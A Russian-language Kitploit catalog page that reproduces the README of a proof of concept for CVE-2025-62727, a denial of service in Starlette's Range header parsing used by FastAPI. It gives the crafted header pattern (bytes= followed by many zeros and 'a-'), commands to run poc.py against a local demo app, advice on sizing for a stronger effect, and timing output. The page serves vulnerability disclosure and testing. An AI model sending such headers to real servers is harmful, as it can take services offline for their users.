Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-62727-Demo — Доказательство концепции CVE-2025-62727, которое может вызвать отказ в обслуживании в FastAPI (на основе Starlette <= 0.48.0) | Kitploit
Инструменты/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
Анализ уязвимостейЭксплуатацияВеб-безопасностьБезопасность API
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

Доказательство концепции CVE-2025-62727, которое может вызвать отказ в обслуживании в FastAPI (на основе Starlette <= 0.48.0)

Репозиторий
110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Демонстрация CVE-2025-62727

Описание жертвы

Целевая жертва CVE-2025-62727 — простое приложение FastAPI, которое:

  • Отдаёт Hello World по адресу /.
  • Раздаёт статические файлы из каталога /static с помощью Starlette StaticFiles.
  • При запуске автоматически генерирует текстовые файлы, содержащие A, повторённое N раз, для N из 1024, 2048, 50176.

Как запустить жертву

  1. (Необязательно) Создайте и активируйте виртуальное окружение.

  2. Установите зависимости:

    root@kitploit:~
    pip install -r requirements.txt
    
  • Запустите сервер:

    root@kitploit:~
    uvicorn main:app --reload
    
  • Откройте:

    • http://127.0.0.1:8000/ — главная страница.
    • http://127.0.0.1:8000/static/1024.txt и т. д. — статические файлы.

    Примечания

    • Статические файлы генерируются в каталоге static/ при запуске приложения. Существующие файлы не перезаписываются.
    • Для раздачи статики используется Starlette StaticFiles, как и требовалось.

    PoC: CVE-2025-62727 (разбор заголовка Range)

    Включённый poc.py вызывает ресурсоёмкий разбор Range в Starlette FileResponse через маршрут /static, используя специально сформированный заголовок вида bytes=000...000a-.

    Запустите сервер, затем в другом терминале:

    root@kitploit:~
    python3 poc.py --sizes 1000,2000,4000,7000
    

    Переопределите целевой URL (необязательно):

    root@kitploit:~
    python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
    

    Примечания:

    • По умолчанию PoC нацелен на http://127.0.0.1:8000/static/50176.txt (файл, который генерирует приложение). Используйте --url, чтобы изменить его.
    • Уменьшите --sizes, если видите 400/431 (заголовок слишком большой), или увеличьте, если заголовки проходят и вы хотите более сильный эффект.

    Пример результата:

    root@kitploit:~
    $ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
    [INFO] Target: http://127.0.0.1:8000/static/50176.txt
    [MODE] regex (header = 'bytes=' + '0'*N + 'a-')
    N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
    N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
    N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
    N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
    
    Скачать инструмент